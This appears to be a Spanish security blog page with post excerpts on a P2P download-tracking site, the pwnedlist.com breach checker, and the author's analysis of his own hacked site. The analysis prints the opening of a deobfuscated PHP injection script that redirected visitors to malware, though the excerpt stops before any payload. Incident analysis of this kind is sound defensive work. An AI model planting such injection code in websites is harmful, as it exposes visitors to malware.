Si has descargado desde redes p2p últimamente, entonces apareces en youhavedownloaded.com

youhavedownloaded.com tiene tu ip si descargas desde redes p2pEn uno de mis posts anteriores os hablé de la existencia de un sitio web que permitía saber si parte de nuestra información personal había sido robada y publicada en Internet. En esta ocasión os voy a comentar la existencia de un nuevo y polémico sitio web que permite consultar nuestro historial de descargas en redes de intercambio de archivos.

El sitio web en cuestión se llama youhavedownloaded.com y tiene unos 50 millones de direcciones ip únicas pertenecientes a usuarios que comparten archivos. Podemos buscar por un nombre de archivo o por una dirección ip y, al visitarlo, automáticamente comprueba si nuestra dirección ip está en la base de datos.

Uno de los fundadores es el ruso Suren Ter-Saakov, quien afirma que el sitio ha indexado aproximadamente el 20% de la actividad de intercambio de archivos en Internet y que youhavedownloaded.com ha sido creado como una prueba de concepto, no teniendo por tanto ninguna aplicación comercial.

Leer más:Si has descargado desde redes p2p últimamente, entonces apareces en youhavedownloaded.com

¿Estás en la lista negra?

Lista negra de usuarios y correos hackeadosDurante el año 2011 se han conocido noticias casi diarias de fugas de información que han tenido como resultado la publicación de muchísima información confidencial. Hace unas semanas se creó una nueva web, pwnedlist.com, que permite a los usuarios comprobar si su correo electrónico o usuario y su información asociada han sido comprometidos.

Este sitio web está impulsado por dos expertos en seguridad de DVLabs, Alen Puzic y Jasiel Spelman. Introduciendo un nombre de usuario o correo electrónico en la caja de búsqueda de la web, nos mostrará si la información figura en alguno de los incidentes de seguridad de las últimas fechas y ha sido publicada en sitios como Pastebin o trackers torrent.

"Estaba tratando de recopilar todos los datos que podía para ver cuántas contraseñas podía encontrar y resultó que en dos horas conseguí 30.000 nombres de usuario y contraseñas", afirma Puzic. "Toda esta cantidad de información me hizo pensar que podría hacer esto cada día y crear un sitio donde los usuarios pudieran comprobar si han sido comprometidos".

Pwnedlist.com acumula casi cinco millones de correos electrónicos y nombres de usuario que han sido volcados a la Red. Además, también recibe información que la gente le envía diariamente a un ritmo de 40.000 cuentas comprometidas cada semana, lo que permite además saber qué organizaciones han perdido los datos.

"Normalmente, dentro de la información sensible hay un archivo readme.txt o algo similar creado por el hacker que realizó la intrusión que indica qué compañía ha sido comprometida. Otras veces es tan obvio como leer los dominios de los correos electrónicos", afirma Puzic.

Como medida de seguridad, Pwnedlist.com no almacena nombres de usuario, correos electrónicos o contraseñas, sino que guarda un hash criptográfico de la información. Como consecuencia, cualquier búsqueda sólo produce una respuesta binaria del tipo "sí" o "no"; no devuelve contraseña alguna ni información de dónde se filtraron los datos.

Aunque el sitio no almacena los nombres de usuario o direcciones de correo que se introducen, sí que guarda un registro de las direcciones IP desde las que se consulta por motivos de seguridad, ya que (qué extaño Lengua fuera) algunos usuarios han intentado incluir malware o exploits en la información que han enviado al sitio web.

Yo he comprobado si aparezco en la lista y el resultado es el siguiente:

 

No he sido hackeado

Aún cuando no aparezco en la consulta, el sitio ofrece unas recomendaciones de seguridad que no está de mal seguir, como usar distintas contraseñas para distintos sitios o usar contraseñas seguras (aquí os dejo una entrada de nuestro blog que habla de este tema).

Y vosotros, ¿estáis en la lista negra?

Primer análisis del incidente

Primer análisis del incidenteComo lo prometido es deuda, aquí os traigo el análisis del incidente que sufrimos el pasado día 07.

Como os alerté en la entrada anterior (y a través de Facebook), la entrada a la página principal del sitio incorporaba un script que redirigía a una página con malware.

Esta redirección fue realizada modificando todos los archivos .php del servidor e insertando un código javascript ofuscado, por lo que mis sospechas recayeron en mi proveedor de hosting, ya que una modificación de tantos archivos implica casi seguramente la ejecución de algún script. Efectivamente, mi proveedor ha confirmado la existencia (y eliminación) de contenido malicioso, aunque no ha reconocido su culpa, sino que se ha limitado a decirme que use contraseñas seguras...

La localización del código malicioso fue relativamente fácil, ya que como os he dicho figuraba en todas las cabeceras de los archivos php, que por lo tanto tenían la misma fecha de modificación. Al abrir cualquiera de estos archivos veíamos el siguiente código:

Código javascript ofuscado


Como podéis observar, se trata de un script ofuscado mediante la función de php base64_decode. Con un simple conversor online de base64 obtenemos lo que esconde:

Código malicioso parcialmente ofuscado

De nuevo el contenido está codificado, pero en este paso ya podemos encontrar la url a la que era redirigida la página con otra decodificación base64 (marcado en rojo en la captura).

El código completo del script es el siguiente:

// Since this hack depends upon the ob_start() function, it does nothing if

// ob_start() is not defined. The 'mr_no' global is a flag to ensure we only run

// this code once per page.


if (function_exists('ob_start') && !isset($GLOBALS['mr_no'])) {

// Set flag to indicate we've already added the hack code.

$GLOBALS['mr_no'] = 1;


// Another duplication check

if (!function_exists('mrobh')) {

// Define the gml() function, which returns the string with the malicious code
if (!function_exists('gml')) {

Leer más:Primer análisis del incidente

Free Internet Security - WOT Web of Trust
2011 Blog.
Powered by Joomla 1.7 Templates